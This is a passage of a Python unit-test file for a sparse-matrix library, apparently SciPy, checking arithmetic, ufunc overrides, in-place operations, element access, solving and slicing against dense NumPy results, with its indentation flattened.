assert_raises(ValueError, i.multiply, j)
continue
sp_mult = i.multiply(j)
if isspmatrix(sp_mult):
assert_almost_equal(sp_mult.todense(), dense_mult)
else:
assert_almost_equal(sp_mult, dense_mult)
def test_elementwise_divide(self):
expected = [[1,np.nan,np.nan,1],[1,np.nan,1,np.nan],[np.nan,1,np.nan,np.nan]]
assert_array_equal(todense(self.datsp / self.datsp),expected)
denom = self.spmatrix(matrix([[1,0,0,4],[-1,0,0,0],[0,8,0,-5]],'d'))
res = matrix([[1,np.nan,np.nan,0.5],[-3,np.nan,inf,np.nan],[np.nan,0.25,np.nan,np.nan]],'d')
assert_array_equal(todense(self.datsp / denom),res)
# complex
A = array([[1-2j,0+5j,-1+0j],[4-3j,-3+6j,5]])
B = array([[5+2j,7-3j,-2+1j],[0-1j,-4+2j,9]])
Asp = self.spmatrix(A)
Bsp = self.spmatrix(B)
assert_almost_equal(todense(Asp / Bsp), A/B)
def test_pow(self):
A = matrix([[1,0,2,0],[0,3,4,0],[0,5,0,0],[0,6,7,8]])
B = self.spmatrix(A)
for exponent in [0,1,2,3]:
assert_array_equal((B**exponent).todense(),A**exponent)
# invalid exponents
for exponent in [-1, 2.2, 1 + 3j]:
assert_raises(Exception, B.__pow__, exponent)
# nonsquare matrix
B = self.spmatrix(A[:3,:])
assert_raises(Exception, B.__pow__, 1)
def test_rmatvec(self):
M = self.spmatrix(matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]]))
assert_array_almost_equal([1,2,3,4]*M, dot([1,2,3,4], M.toarray()))
row = matrix([[1,2,3,4]])
assert_array_almost_equal(row*M, row*M.todense())
def test_small_multiplication(self):
# test that A*x works for x with shapes (), (1,) and (1,1)
A = self.spmatrix([[1],[2],[3]])
assert_(isspmatrix(A * array(1)))
assert_equal((A * array(1)).todense(), [[1],[2],[3]])
assert_equal(A * array([1]), array([1,2,3]))
assert_equal(A * array([[1]]), array([[1],[2],[3]]))
def test_binop_custom_type(self):
# Non-regression test: previously, binary operations would raise
# NotImplementedError instead of returning NotImplemented
# (https://docs.python.org/library/constants.html#NotImplemented)
# so overloading Custom + matrix etc. didn't work.
A = self.spmatrix([[1], [2], [3]])
B = BinopTester()
assert_equal(A + B, "matrix on the left")
assert_equal(A - B, "matrix on the left")
assert_equal(A * B, "matrix on the left")
assert_equal(B + A, "matrix on the right")
assert_equal(B - A, "matrix on the right")
assert_equal(B * A, "matrix on the right")
def test_matvec(self):
M = self.spmatrix(matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]]))
col = matrix([1,2,3]).T
assert_array_almost_equal(M * col, M.todense() * col)
# check result dimensions (ticket #514)
assert_equal((M * array([1,2,3])).shape,(4,))
assert_equal((M * array([[1],[2],[3]])).shape,(4,1))
assert_equal((M * matrix([[1],[2],[3]])).shape,(4,1))
# check result type
assert_(isinstance(M * array([1,2,3]), ndarray))
assert_(isinstance(M * matrix([1,2,3]).T, matrix))
# ensure exception is raised for improper dimensions
bad_vecs = [array([1,2]), array([1,2,3,4]), array([[1],[2]]),
matrix([1,2,3]), matrix([[1],[2]])]
for x in bad_vecs:
assert_raises(ValueError, M.__mul__, x)
# Should this be supported or not?!
# flat = array([1,2,3])
# assert_array_almost_equal(M*flat, M.todense()*flat)
# Currently numpy dense matrices promote the result to a 1x3 matrix,
# whereas sparse matrices leave the result as a rank-1 array. Which
# is preferable?
# Note: the following command does not work. Both NumPy matrices
# and spmatrices should raise exceptions!
# assert_array_almost_equal(M*[1,2,3], M.todense()*[1,2,3])
# The current relationship between sparse matrix products and array
# products is as follows:
assert_array_almost_equal(M*array([1,2,3]), dot(M.A,[1,2,3]))
assert_array_almost_equal(M*[[1],[2],[3]], asmatrix(dot(M.A,[1,2,3])).T)
# Note that the result of M * x is dense if x has a singleton dimension.
# Currently M.matvec(asarray(col)) is rank-1, whereas M.matvec(col)
# is rank-2. Is this desirable?
def test_matmat_sparse(self):
a = matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
a2 = array([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
b = matrix([[0,1],[1,0],[0,2]],'d')
asp = self.spmatrix(a)
bsp = self.spmatrix(b)
assert_array_almost_equal((asp*bsp).todense(), a*b)
assert_array_almost_equal(asp*b, a*b)
assert_array_almost_equal(a*bsp, a*b)
assert_array_almost_equal(a2*bsp, a*b)
# Now try performing cross-type multiplication:
csp = bsp.tocsc()
c = b
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal(asp*c, a*c)
assert_array_almost_equal(a*csp, a*c)
assert_array_almost_equal(a2*csp, a*c)
csp = bsp.tocsr()
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal(asp*c, a*c)
assert_array_almost_equal(a*csp, a*c)
assert_array_almost_equal(a2*csp, a*c)
csp = bsp.tocoo()
assert_array_almost_equal((asp*csp).todense(), a*c)
assert_array_almost_equal(asp*c, a*c)
assert_array_almost_equal(a*csp, a*c)
assert_array_almost_equal(a2*csp, a*c)
# Test provided by Andy Fraser, 2006-03-26
L = 30
frac = .3
random.seed(0) # make runs repeatable
A = zeros((L,2))
for i in xrange(L):
for j in xrange(2):
r = random.random()
if r < frac:
A[i,j] = r/frac
A = self.spmatrix(A)
B = A*A.T
assert_array_almost_equal(B.todense(), A.todense() * A.T.todense())
assert_array_almost_equal(B.todense(), A.todense() * A.todense().T)
# check dimension mismatch 2x2 times 3x2
A = self.spmatrix([[1,2],[3,4]])
B = self.spmatrix([[1,2],[3,4],[5,6]])
assert_raises(ValueError, A.__mul__, B)
def test_matmat_dense(self):
a = matrix([[3,0,0],[0,1,0],[2,0,3.0],[2,3,0]])
asp = self.spmatrix(a)
# check both array and matrix types
bs = [array([[1,2],[3,4],[5,6]]), matrix([[1,2],[3,4],[5,6]])]
for b in bs:
result = asp*b
assert_(isinstance(result, type(b)))
assert_equal(result.shape, (4,2))
assert_equal(result, dot(a,b))
def test_sparse_format_conversions(self):
A = sparse.kron([[1,0,2],[0,3,4],[5,0,0]], [[1,2],[0,3]])
D = A.todense()
A = self.spmatrix(A)
for format in ['bsr','coo','csc','csr','dia','dok','lil']:
a = A.asformat(format)
assert_equal(a.format,format)
assert_array_equal(a.todense(), D)
b = self.spmatrix(D+3j).asformat(format)
assert_equal(b.format,format)
assert_array_equal(b.todense(), D+3j)
c = eval(format + '_matrix')(A)
assert_equal(c.format,format)
assert_array_equal(c.todense(), D)
def test_tobsr(self):
x = array([[1,0,2,0],[0,0,0,0],[0,0,4,5]])
y = array([[0,1,2],[3,0,5]])
A = kron(x,y)
Asp = self.spmatrix(A)
for format in ['bsr']:
fn = getattr(Asp, 'to' + format)
for X in [1, 2, 3, 6]:
for Y in [1, 2, 3, 4, 6, 12]:
assert_equal(fn(blocksize=(X,Y)).todense(), A)
def test_transpose(self):
dat_1 = self.dat
dat_2 = np.array([[]])
matrices = [dat_1, dat_2]
def check(dtype, j):
dat = np.matrix(matrices[j], dtype=dtype)
datsp = self.spmatrix(dat)
a = datsp.transpose()
b = dat.transpose()
assert_array_equal(a.todense(), b)
assert_array_equal(a.transpose().todense(), dat)
assert_equal(a.dtype, b.dtype)
assert_array_equal(self.spmatrix((3,4)).T.todense(), zeros((4,3)))
for dtype in self.checked_dtypes:
for j in range(len(matrices)):
yield check, dtype, j
def test_add_dense(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
# adding a dense matrix to a sparse matrix
sum1 = dat + datsp
assert_array_equal(sum1, dat + dat)
sum2 = datsp + dat
assert_array_equal(sum2, dat + dat)
for dtype in self.checked_dtypes:
yield check, dtype
def test_sub_dense(self):
# subtracting a dense matrix from a sparse matrix and vice versa
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
# Behavior is different for bool.
if dat.dtype == bool:
sum1 = dat - datsp
assert_array_equal(sum1, dat - dat)
sum2 = datsp - dat
assert_array_equal(sum2, dat - dat)
else:
# Manually add to avoid upcasting from scalar
# multiplication.
sum1 = (dat + dat + dat) - datsp
assert_array_equal(sum1, dat + dat)
sum2 = (datsp + datsp + datsp) - dat
assert_array_equal(sum2, dat + dat)
for dtype in self.checked_dtypes:
if (dtype == np.dtype('bool')) and (
NumpyVersion(np.__version__) >= '1.9.0.dev'):
# boolean array subtraction deprecated in 1.9.0
continue
yield check, dtype
def test_maximum_minimum(self):
A_dense = np.array([[1, 0, 3], [0, 4, 5], [0, 0, 0]])
B_dense = np.array([[1, 1, 2], [0, 3, 6], [1, -1, 0]])
A_dense_cpx = np.array([[1, 0, 3], [0, 4+2j, 5], [0, 1j, -1j]])
def check(dtype, dtype2, btype):
if np.issubdtype(dtype, np.complexfloating):
A = self.spmatrix(A_dense_cpx.astype(dtype))
else:
A = self.spmatrix(A_dense.astype(dtype))
if btype == 'scalar':
B = dtype2.type(1)
elif btype == 'scalar2':
B = dtype2.type(-1)
elif btype == 'dense':
B = B_dense.astype(dtype2)
elif btype == 'sparse':
B = self.spmatrix(B_dense.astype(dtype2))
else:
raise ValueError()
max_s = A.maximum(B)
max_d = np.maximum(todense(A), todense(B))
assert_array_equal(todense(max_s), max_d)
assert_equal(max_s.dtype, max_d.dtype)
min_s = A.minimum(B)
min_d = np.minimum(todense(A), todense(B))
assert_array_equal(todense(min_s), min_d)
assert_equal(min_s.dtype, min_d.dtype)
for dtype in self.checked_dtypes:
for dtype2 in [np.int8, np.float_, np.complex_]:
for btype in ['scalar', 'scalar2', 'dense', 'sparse']:
yield check, np.dtype(dtype), np.dtype(dtype2), btype
def test_copy(self):
# Check whether the copy=True and copy=False keywords work
A = self.datsp
# check that copy preserves format
assert_equal(A.copy().format, A.format)
assert_equal(A.__class__(A,copy=True).format, A.format)
assert_equal(A.__class__(A,copy=False).format, A.format)
assert_equal(A.copy().todense(), A.todense())
assert_equal(A.__class__(A,copy=True).todense(), A.todense())
assert_equal(A.__class__(A,copy=False).todense(), A.todense())
# check that XXX_matrix.toXXX() works
toself = getattr(A,'to' + A.format)
assert_equal(toself().format, A.format)
assert_equal(toself(copy=True).format, A.format)
assert_equal(toself(copy=False).format, A.format)
assert_equal(toself().todense(), A.todense())
assert_equal(toself(copy=True).todense(), A.todense())
assert_equal(toself(copy=False).todense(), A.todense())
# check whether the data is actually copied
# TODO: deal with non-indexable types somehow
B = A.copy()
try:
B[0,0] += 1
assert_(B[0,0] != A[0,0])
except NotImplementedError:
# not all sparse matrices can be indexed
pass
except TypeError:
# not all sparse matrices can be indexed
pass
# test that __iter__ is compatible with NumPy matrix
def test_iterator(self):
B = np.matrix(np.arange(50).reshape(5, 10))
A = self.spmatrix(B)
for x, y in zip(A, B):
assert_equal(x.todense(), y)
def test_size_zero_matrix_arithmetic(self):
# Test basic matrix arithmetic with shapes like (0,0), (10,0),
# (0, 3), etc.
mat = np.matrix([])
a = mat.reshape((0, 0))
b = mat.reshape((0, 1))
c = mat.reshape((0, 5))
d = mat.reshape((1, 0))
e = mat.reshape((5, 0))
f = np.matrix(np.ones([5, 5]))
asp = self.spmatrix(a)
bsp = self.spmatrix(b)
csp = self.spmatrix(c)
dsp = self.spmatrix(d)
esp = self.spmatrix(e)
fsp = self.spmatrix(f)
# matrix product.
assert_array_equal(asp.dot(asp).A, np.dot(a, a).A)
assert_array_equal(bsp.dot(dsp).A, np.dot(b, d).A)
assert_array_equal(dsp.dot(bsp).A, np.dot(d, b).A)
assert_array_equal(csp.dot(esp).A, np.dot(c, e).A)
assert_array_equal(csp.dot(fsp).A, np.dot(c, f).A)
assert_array_equal(esp.dot(csp).A, np.dot(e, c).A)
assert_array_equal(dsp.dot(csp).A, np.dot(d, c).A)
assert_array_equal(fsp.dot(esp).A, np.dot(f, e).A)
# bad matrix products
assert_raises(ValueError, dsp.dot, e)
assert_raises(ValueError, asp.dot, d)
# element-wise multiplication
assert_array_equal(asp.multiply(asp).A, np.multiply(a, a).A)
assert_array_equal(bsp.multiply(bsp).A, np.multiply(b, b).A)
assert_array_equal(dsp.multiply(dsp).A, np.multiply(d, d).A)
assert_array_equal(asp.multiply(a).A, np.multiply(a, a).A)
assert_array_equal(bsp.multiply(b).A, np.multiply(b, b).A)
assert_array_equal(dsp.multiply(d).A, np.multiply(d, d).A)
assert_array_equal(asp.multiply(6).A, np.multiply(a, 6).A)
assert_array_equal(bsp.multiply(6).A, np.multiply(b, 6).A)
assert_array_equal(dsp.multiply(6).A, np.multiply(d, 6).A)
# bad element-wise multiplication
assert_raises(ValueError, asp.multiply, c)
assert_raises(ValueError, esp.multiply, c)
# Addition
assert_array_equal(asp.__add__(asp).A, a.__add__(a).A)
assert_array_equal(bsp.__add__(bsp).A, b.__add__(b).A)
assert_array_equal(dsp.__add__(dsp).A, d.__add__(d).A)
# bad addition
assert_raises(ValueError, asp.__add__, dsp)
assert_raises(ValueError, bsp.__add__, asp)
def test_size_zero_conversions(self):
mat = np.matrix([])
a = mat.reshape((0, 0))
b = mat.reshape((0, 5))
c = mat.reshape((5, 0))
for m in [a, b, c]:
spm = self.spmatrix(m)
assert_array_equal(spm.tocoo().A, m)
assert_array_equal(spm.tocsr().A, m)
assert_array_equal(spm.tocsc().A, m)
assert_array_equal(spm.tolil().A, m)
assert_array_equal(spm.todok().A, m)
assert_array_equal(spm.tobsr().A, m)
def test_unary_ufunc_overrides(self):
def check(name):
if not HAS_NUMPY_UFUNC:
if name == "sign":
raise nose.SkipTest("sign conflicts with comparison op "
"support on Numpy without __numpy_ufunc__")
if self.spmatrix in (dok_matrix, lil_matrix):
raise nose.SkipTest("Unary ops not implemented for dok/lil "
"with Numpy without __numpy_ufunc__")
ufunc = getattr(np, name)
X = self.spmatrix(np.arange(20).reshape(4, 5) / 20.)
X0 = ufunc(X.toarray())
X2 = ufunc(X)
assert_array_equal(X2.toarray(), X0)
if HAS_NUMPY_UFUNC:
# the out argument doesn't work on Numpy without __numpy_ufunc__
out = np.zeros_like(X0)
X3 = ufunc(X, out=out)
assert_(X3 is out)
assert_array_equal(todense(X3), ufunc(todense(X)))
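# also exercise a sparse `out`; pre-fill one column so an incomplete overwrite would be caught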
out = csc_matrix(out.shape, dtype=out.dtype)
out[:,1] = 999
X4 = ufunc(X, out=out)
assert_(X4 is out)
assert_array_equal(todense(X4), ufunc(todense(X)))
for name in ["sin", "tan", "arcsin", "arctan", "sinh", "tanh",
"arcsinh", "arctanh", "rint", "sign", "expm1", "log1p",
"deg2rad", "rad2deg", "floor", "ceil", "trunc", "sqrt",
"abs"]:
yield check, name
def test_binary_ufunc_overrides(self):
# data
a = np.array([[1, 2, 3],
[4, 5, 0],
[7, 8, 9]])
b = np.array([[9, 8, 7],
[6, 0, 0],
[3, 2, 1]])
c = 1.0
d = 1 + 2j
e = 5
asp = self.spmatrix(a)
bsp = self.spmatrix(b)
a_items = dict(dense=a, scalar=c, cplx_scalar=d, int_scalar=e, sparse=asp)
b_items = dict(dense=b, scalar=c, cplx_scalar=d, int_scalar=e, sparse=bsp)
@dec.skipif(not HAS_NUMPY_UFUNC, "feature requires Numpy with __numpy_ufunc__")
def check(i, j, dtype):
ax = a_items[i]
bx = b_items[j]
if issparse(ax):
ax = ax.astype(dtype)
if issparse(bx):
bx = bx.astype(dtype)
a = todense(ax)
b = todense(bx)
def check_one(ufunc, allclose=False):
# without out argument
expected = ufunc(a, b)
got = ufunc(ax, bx)
if allclose:
assert_allclose(todense(got), expected,
rtol=5e-15, atol=0)
else:
assert_array_equal(todense(got), expected)
# with out argument
out = np.zeros(got.shape, dtype=got.dtype)
out.fill(np.nan)
got = ufunc(ax, bx, out=out)
assert_(got is out)
if allclose:
assert_allclose(todense(got), expected,
rtol=5e-15, atol=0)
else:
assert_array_equal(todense(got), expected)
out = csr_matrix(got.shape, dtype=out.dtype)
out[0,:] = 999
got = ufunc(ax, bx, out=out)
assert_(got is out)
if allclose:
assert_allclose(todense(got), expected,
rtol=5e-15, atol=0)
else:
assert_array_equal(todense(got), expected)
# -- commutative
# multiply
check_one(np.multiply)
# add
if isscalarlike(ax) or isscalarlike(bx):
try:
check_one(np.add)
except NotImplementedError:
# Not implemented for all spmatrix types
pass
else:
check_one(np.add)
# maximum
check_one(np.maximum)
# minimum
check_one(np.minimum)
# -- non-commutative
# dot
check_one(np.dot)
# subtract
if isscalarlike(ax) or isscalarlike(bx):
try:
check_one(np.subtract)
except NotImplementedError:
# Not implemented for all spmatrix types
pass
else:
check_one(np.subtract)
# divide
with np.errstate(divide='ignore', invalid='ignore'):
if isscalarlike(bx):
# Rounding error may be different, as the sparse implementation
# computes a/b -> a * (1/b) if b is a scalar
check_one(np.divide, allclose=True)
else:
check_one(np.divide)
# true_divide
if isscalarlike(bx):
check_one(np.true_divide, allclose=True)
else:
check_one(np.true_divide)
for i in a_items.keys():
for j in b_items.keys():
for dtype in [np.int_, np.float_, np.complex_]:
if i == 'sparse' or j == 'sparse':
yield check, i, j, dtype
@dec.skipif(not HAS_NUMPY_UFUNC, "feature requires Numpy with __numpy_ufunc__")
def test_ufunc_object_array(self):
# This tests compatibility with previous Numpy object array
# ufunc behavior. See gh-3345.
a = self.spmatrix([[1, 2]])
b = self.spmatrix([[3], [4]])
c = self.spmatrix([[5], [6]])
# Should distribute the operation across the object array
d = np.multiply(a, np.array([[b], [c]]))
assert_(d.dtype == np.object_)
assert_(d.shape == (2, 1))
assert_allclose(d[0,0].A, (a*b).A)
assert_allclose(d[1,0].A, (a*c).A)
# Lists also get cast to object arrays
d = np.multiply(a, [[b], [c]])
assert_(d.dtype == np.object_)
assert_(d.shape == (2, 1))
assert_allclose(d[0,0].A, (a*b).A)
assert_allclose(d[1,0].A, (a*c).A)
# This returned NotImplemented in Numpy < 1.9; do it properly now
d = np.multiply(np.array([[b], [c]]), a)
assert_(d.dtype == np.object_)
assert_(d.shape == (2, 1))
assert_allclose(d[0,0].A, (b*a).A)
assert_allclose(d[1,0].A, (c*a).A)
d = np.subtract(np.array(b, dtype=object), c)
assert_(isinstance(d, sparse.spmatrix))
assert_allclose(d.A, (b - c).A)
class _TestInplaceArithmetic:
def test_inplace_dense(self):
a = np.ones((3, 4))
b = self.spmatrix(a)
with warnings.catch_warnings():
if not HAS_NUMPY_UFUNC:
warnings.simplefilter("ignore", DeprecationWarning)
x = a.copy()
y = a.copy()
x += a
y += b
assert_array_equal(x, y)
x = a.copy()
y = a.copy()
x -= a
y -= b
assert_array_equal(x, y)
# This is matrix product, from __rmul__
assert_raises(ValueError, operator.imul, x, b)
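# In-place multiplication by the transposed sparse matrix is likewise a
# matrix product, so compare against an explicit dot.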
x = a.copy()
y = a.copy()
x = x.dot(a.T)
y *= b.T
assert_array_equal(x, y)
# Matrix (non-elementwise) floor division is not defined
assert_raises(TypeError, operator.ifloordiv, x, b)
def test_imul_scalar(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
# Avoid implicit casting.
if np.can_cast(type(2), dtype, casting='same_kind'):
a = datsp.copy()
a *= 2
b = dat.copy()
b *= 2
assert_array_equal(b, a.todense())
if np.can_cast(type(17.3), dtype, casting='same_kind'):
a = datsp.copy()
a *= 17.3
b = dat.copy()
b *= 17.3
assert_array_equal(b, a.todense())
for dtype in self.checked_dtypes:
yield check, dtype
def test_idiv_scalar(self):
def check(dtype):
dat = self.dat_dtypes[dtype]
datsp = self.datsp_dtypes[dtype]
if np.can_cast(type(2), dtype, casting='same_kind'):
a = datsp.copy()
a /= 2
b = dat.copy()
b /= 2
assert_array_equal(b, a.todense())
if np.can_cast(type(17.3), dtype, casting='same_kind'):
a = datsp.copy()
a /= 17.3
b = dat.copy()
b /= 17.3
assert_array_equal(b, a.todense())
for dtype in self.checked_dtypes:
# /= should only be used with float dtypes to avoid implicit
# casting.
if not np.can_cast(dtype, np.int_):
yield check, dtype
def test_inplace_success(self):
# Inplace ops should work even if a specialized version is not
# implemented, falling back to x = x <op> y
a = self.spmatrix(np.eye(5))
b = self.spmatrix(np.eye(5))
bp = self.spmatrix(np.eye(5))
b += a
bp = bp + a
assert_allclose(b.A, bp.A)
b *= a
bp = bp * a
assert_allclose(b.A, bp.A)
b -= a
bp = bp - a
assert_allclose(b.A, bp.A)
assert_raises(TypeError, operator.ifloordiv, a, b)
class _TestGetSet:
def test_getelement(self):
def check(dtype):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
D = array([[1,0,0],
[4,3,0],
[0,2,0],
[0,0,0]], dtype=dtype)
A = self.spmatrix(D)
M,N = D.shape
for i in range(-M, M):
for j in range(-N, N):
assert_equal(A[i,j], D[i,j])
for ij in [(0,3),(-1,3),(4,0),(4,3),(4,-1), (1, 2, 3)]:
assert_raises((IndexError, TypeError), A.__getitem__, ij)
for dtype in supported_dtypes:
yield check, np.dtype(dtype)
def test_setelement(self):
def check(dtype):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
A = self.spmatrix((3,4), dtype=dtype)
A[0, 0] = dtype.type(0) # bug 870
A[1, 2] = dtype.type(4.0)
A[0, 1] = dtype.type(3)
A[2, 0] = dtype.type(2.0)
A[0,-1] = dtype.type(8)
A[-1,-2] = dtype.type(7)
A[0, 1] = dtype.type(5)
if dtype != np.bool_:
assert_array_equal(A.todense(),[[0,5,0,8],[0,0,4,0],[2,0,7,0]])
for ij in [(0,4),(-1,4),(3,0),(3,4),(3,-1)]:
assert_raises(IndexError, A.__setitem__, ij, 123.0)
for v in [[1,2,3], array([1,2,3])]:
assert_raises(ValueError, A.__setitem__, (0,0), v)
if (not np.issubdtype(dtype, np.complexfloating) and
dtype != np.bool_):
for v in [3j]:
assert_raises(TypeError, A.__setitem__, (0,0), v)
for dtype in supported_dtypes:
yield check, np.dtype(dtype)
def test_negative_index_assignment(self):
# Regression test for github issue 4428.
def check(dtype):
A = self.spmatrix((3, 10), dtype=dtype)
A[0, -4] = 1
assert_equal(A[0, -4], 1)
for dtype in self.checked_dtypes:
yield check, np.dtype(dtype)
def test_scalar_assign_2(self):
n, m = (5, 10)
def _test_set(i, j, nitems):
msg = "%r ; %r ; %r" % (i, j, nitems)
A = self.spmatrix((n, m))
A[i, j] = 1
assert_almost_equal(A.sum(), nitems, err_msg=msg)
assert_almost_equal(A[i, j], 1, err_msg=msg)
# [i,j]
for i, j in [(2, 3), (-1, 8), (-1, -2), (array(-1), -2), (-1, array(-2)),
(array(-1), array(-2))]:
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
_test_set(i, j, 1)
def test_index_scalar_assign(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
A = self.spmatrix((5, 5))
B = np.zeros((5, 5))
for C in [A, B]:
C[0,1] = 1
C[3,0] = 4
C[3,0] = 9
assert_array_equal(A.toarray(), B)
class _TestSolve:
def test_solve(self):
# Test whether the lu_solve command segfaults, as reported by Nils
# Wagner for a 64-bit machine, 02 March 2005 (EJS)
n = 20
np.random.seed(0) # make tests repeatable
A = zeros((n,n), dtype=complex)
x = np.random.rand(n)
y = np.random.rand(n-1)+1j*np.random.rand(n-1)
r = np.random.rand(n)
for i in range(len(x)):
A[i,i] = x[i]
for i in range(len(y)):
A[i,i+1] = y[i]
A[i+1,i] = conjugate(y[i])
A = self.spmatrix(A)
x = splu(A).solve(r)
assert_almost_equal(A*x,r)
class _TestSlicing:
def test_dtype_preservation(self):
assert_equal(self.spmatrix((1,10), dtype=np.int16)[0,1:5].dtype, np.int16)
assert_equal(self.spmatrix((1,10), dtype=np.int32)[0,1:5].dtype, np.int32)
assert_equal(self.spmatrix((1,10), dtype=np.float32)[0,1:5].dtype, np.float32)
assert_equal(self.spmatrix((1,10), dtype=np.float64)[0,1:5].dtype, np.float64)
def test_get_horiz_slice(self):
B = asmatrix(arange(50.).reshape(5,10))
A = self.spmatrix(B)
assert_array_equal(B[1,:], A[1,:].todense())
assert_array_equal(B[1,2:5], A[1,2:5].todense())
C = matrix([[1, 2, 1], [4, 0, 6], [0, 0, 0], [0, 0, 1]])
D = self.spmatrix(C)
assert_array_equal(C[1, 1:3], D[1, 1:3].todense())
# Now test slicing when a row contains only zeros
E = matrix([[1, 2, 1], [4, 0, 0], [0, 0, 0], [0, 0, 1]])
F = self.spmatrix(E)
assert_array_equal(E[1, 1:3], F[1, 1:3].todense())
assert_array_equal(E[2, -2:], F[2, -2:].A)
# The following should raise exceptions:
assert_raises(IndexError, A.__getitem__, (slice(None), 11))
assert_raises(IndexError, A.__getitem__, (6, slice(3, 7)))
def test_get_vert_slice(self):
B = asmatrix(arange(50.).reshape(5,10))
A = self.spmatrix(B)
assert_array_equal(B[2:5,0], A[2:5,0].todense())
assert_array_equal(B[:,1], A[:,1].todense())
C = matrix([[1, 2, 1], [4, 0, 6], [0, 0, 0], [0, 0, 1]])
D = self.spmatrix(C)
assert_array_equal(C[1:3, 1], D[1:3, 1].todense())
assert_array_equal(C[:, 2], D[:, 2].todense())
# Now test slicing when a column contains only zeros
E = matrix([[1, 0, 1], [4, 0, 0], [0, 0, 0], [0, 0, 1]])
F = self.spmatrix(E)
assert_array_equal(E[:, 1], F[:, 1].todense())
assert_array_equal(E[-2:, 2], F[-2:, 2].todense())
# The following should raise exceptions:
assert_raises(IndexError, A.__getitem__, (slice(None), 11))
assert_raises(IndexError, A.__getitem__, (6, slice(3, 7)))
def test_get_slices(self):
B = asmatrix(arange(50.).reshape(5,10))
A = self.spmatrix(B)
assert_array_equal(A[2:5,0:3].todense(), B[2:5,0:3])
assert_array_equal(A[1:,:-1].todense(), B[1:,:-1])
assert_array_equal(A[:-1,1:].todense(), B[:-1,1:])
# Now test slicing when a column contains only zeros
E = matrix([[1, 0, 1], [4, 0, 0], [0, 0, 0], [0, 0, 1]])
F = self.spmatrix(E)
assert_array_equal(E[1:2, 1:2], F[1:2, 1:2].todense())
assert_array_equal(E[:, 1:], F[:, 1:].todense())
def test_non_unit_stride_2d_indexing(self):
# Regression test -- used to silently ignore the stride.
v0 = np.random.rand(50, 50)
try:
v = self.spmatrix(v0)[0:25:2, 2:30:3]
except ValueError:
# if unsupported
raise nose.SkipTest("feature not implemented")
assert_array_equal(v.todense(),
v0[0:25:2, 2:30:3])
def test_slicing_2(self):
B = asmatrix(arange(50).reshape(5,10))
A = self.spmatrix(B)
# [i,j]
assert_equal(A[2,3], B[2,3])
assert_equal(A[-1,8], B[-1,8])
assert_equal(A[-1,-2],B[-1,-2])
assert_equal(A[array(-1),-2],B[-1,-2])
assert_equal(A[-1,array(-2)],B[-1,-2])
assert_equal(A[array(-1),array(-2)],B[-1,-2])
# [i,1:2]
assert_equal(A[2,:].todense(), B[2,:])
assert_equal(A[2,5:-2].todense(),B[2,5:-2])
assert_equal(A[array(2),5:-2].todense(),B[2,5:-2])
# [1:2,j]
assert_equal(A[:,2].todense(), B[:,2])
assert_equal(A[3:4,9].todense(), B[3:4,9])
assert_equal(A[1:4,-5].todense(),B[1:4,-5])
assert_equal(A[2:-1,3].todense(),B[2:-1,3])
assert_equal(A[2:-1,array(3)].todense(),B[2:-1,3])
# [1:2,1:2]
assert_equal(A[1:2,1:2].todense(),B[1:2,1:2])
assert_equal(A[4:,3:].todense(), B[4:,3:])
assert_equal(A[:4,:5].todense(), B[:4,:5])
assert_equal(A[2:-1,:5].todense(),B[2:-1,:5])
# [i]
assert_equal(A[1,:].todense(), B[1,:])
assert_equal(A[-2,:].todense(),B[-2,:])
assert_equal(A[array(-2),:].todense(),B[-2,:])
# [1:2]
assert_equal(A[1:4].todense(), B[1:4])
assert_equal(A[1:-2].todense(),B[1:-2])
# Check bug reported by Robert Cimrman:
# http://thread.gmane.org/gmane.comp.python.scientific.devel/7986
s = slice(int8(2),int8(4),None)
assert_equal(A[s,:].todense(), B[2:4,:])
assert_equal(A[:,s].todense(), B[:,2:4])
def test_slicing_3(self):
B = asmatrix(arange(50).reshape(5,10))
A = self.spmatrix(B)
s_ = np.s_
slices = [s_[:2], s_[1:2], s_[3:], s_[3::2],
s_[8:3:-1], s_[4::-2], s_[:5:-1],
0, 1, s_[:], s_[1:5], -1, -2, -5,
array(-1), np.int8(-3)]
def check_1(a):
x = A[a]
y = B[a]
if y.shape == ():
assert_equal(x, y, repr(a))
else:
if x.size == 0 and y.size == 0:
pass
else:
assert_array_equal(x.todense(), y, repr(a))
for j, a in enumerate(slices):
yield check_1, a
def check_2(a, b):
# Indexing np.matrix with 0-d arrays seems to be broken,
# as they seem not to be treated as scalars.
# https://github.com/numpy/numpy/issues/3110
if isinstance(a, np.ndarray):
ai = int(a)
else:
ai = a
if isinstance(b, np.ndarray):
bi = int(b)
else:
bi = b
x = A[a, b]
y = B[ai, bi]
if y.shape == ():
assert_equal(x, y, repr((a, b)))
else:
if x.size == 0 and y.size == 0:
pass
else:
assert_array_equal(x.todense(), y, repr((a, b)))
for i, a in enumerate(slices):
for j, b in enumerate(slices):
yield check_2, a, b
def test_ellipsis_slicing(self):
b = asmatrix(arange(50).reshape(5,10))
a = self.spmatrix(b)
assert_array_equal(a[...].A, b[...].A)
assert_array_equal(a[...,].A, b[...,].A)
assert_array_equal(a[1, ...].A, b[1, ...].A)
assert_array_equal(a[..., 1].A, b[..., 1].A)
assert_array_equal(a[1:, ...].A, b[1:, ...].A)
assert_array_equal(a[..., 1:].A, b[..., 1:].A)
assert_array_equal(a[1:, 1, ...].A, b[1:, 1, ...].A)
assert_array_equal(a[1, ..., 1:].A, b[1, ..., 1:].A)
# These return ints
assert_equal(a[1, 1, ...], b[1, 1, ...])
assert_equal(a[1, ..., 1], b[1, ..., 1])
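# Indexing with more than one ellipsis was deprecated in numpy 1.9, so the
# following test only runs on older numpy versions.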
